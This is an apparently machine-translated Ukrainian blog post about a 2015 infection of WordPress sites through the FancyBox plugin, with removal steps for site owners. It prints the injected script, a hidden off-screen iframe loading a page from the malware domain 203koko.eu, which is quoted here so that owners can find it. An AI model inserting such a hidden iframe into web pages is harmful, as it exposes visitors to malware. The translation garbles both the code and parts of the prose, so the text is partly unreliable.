[Malware Iframe 203koko] Malware Заражений WordPress сайти

Раніше на цьому тижні ряд сайтів та блогів WordPress, отримали попередження шкідливі інфекції через Google Веб-майстри.

Проблема, до якої Google Веб-майстри згадується є наявність код / сценарій шкідливе програмне забезпечення iframe вихідні веб-сайтів.

<Script> якщо (navigator.userAgent.match (/ MSIE / я)) {document.write ( «<DIV стиль =" позицію: абсолютна, зліва: -2000px; ширина: 2000px "> <IFRAME SRC =« HTTP: / /203koko.eu/hjnfh/ipframe2.php "ширина =" 20 "висота =" 30 «> </ IFRAME> </ DIV>«); } </ SCRIPT>

Здається, що це вразливість a підключатиAcquis FancyBox для WordPress який до вчорашнього дня (05.02.2015) ніколи не оновлюються протягом тривалого часу.
Вирішуючи цю проблему і лікування вірусів сайтів з цим шкідливим програмним забезпеченням, є відносно простою.
1. Вимкнути плагін FancyBox.
2. Видалити всі файли плагінів FancyBox з сервера (через FTP)
3. Встановити нову версію плагіна (FancyBox 3.0.4)

FancyBox для WordPress 3.0.4

- Перейменовано налаштування, на яке поширюється проблема безпеки, згадана в 3.0.3. Це повинно призупинити виявлення зловмисного коду на сайтах, де плагін оновлюється, не видаляючи шкідливий код.

FancyBox для WordPress 3.0.3

- Виправлена ​​проблема безпеки.

Інформація про шкідливі програми:

ТИП: Iframe перенаправлення
TARGET: FancyBox WordPress
MALWARE домен: 203koko.eu
Шкідливе URI: http://203koko.eu/hjnfh/ipframe2.php
RAW шкідливий код: <IFRAME SRC = "http://203koko.eu/hjnfh/ipframe2.php" ширина = "20" висота = "30"> </ IFRAME>
MALWARE скрипт: <SCRIPT>, якщо ((/ / я) navigator.userAgent.match MSIE) {document.write ('<стиль = "позицію: абсолютна; ліворуч: -2000px; ширина: 2000px" DIV>

Видалення шкідливих програм з вашого сайту WordPress.

[Malware Iframe 203koko] Malware Заражений WordPress сайти

Про автора

Stealth LP

Засновник і головний редактор налаштування StealthУ день 2006.
Досвід роботи з операційними системами Linux (особливо CentOS), Mac OS X, Windows XP> Windows 10 і WordPress (CMS).

Залишити коментар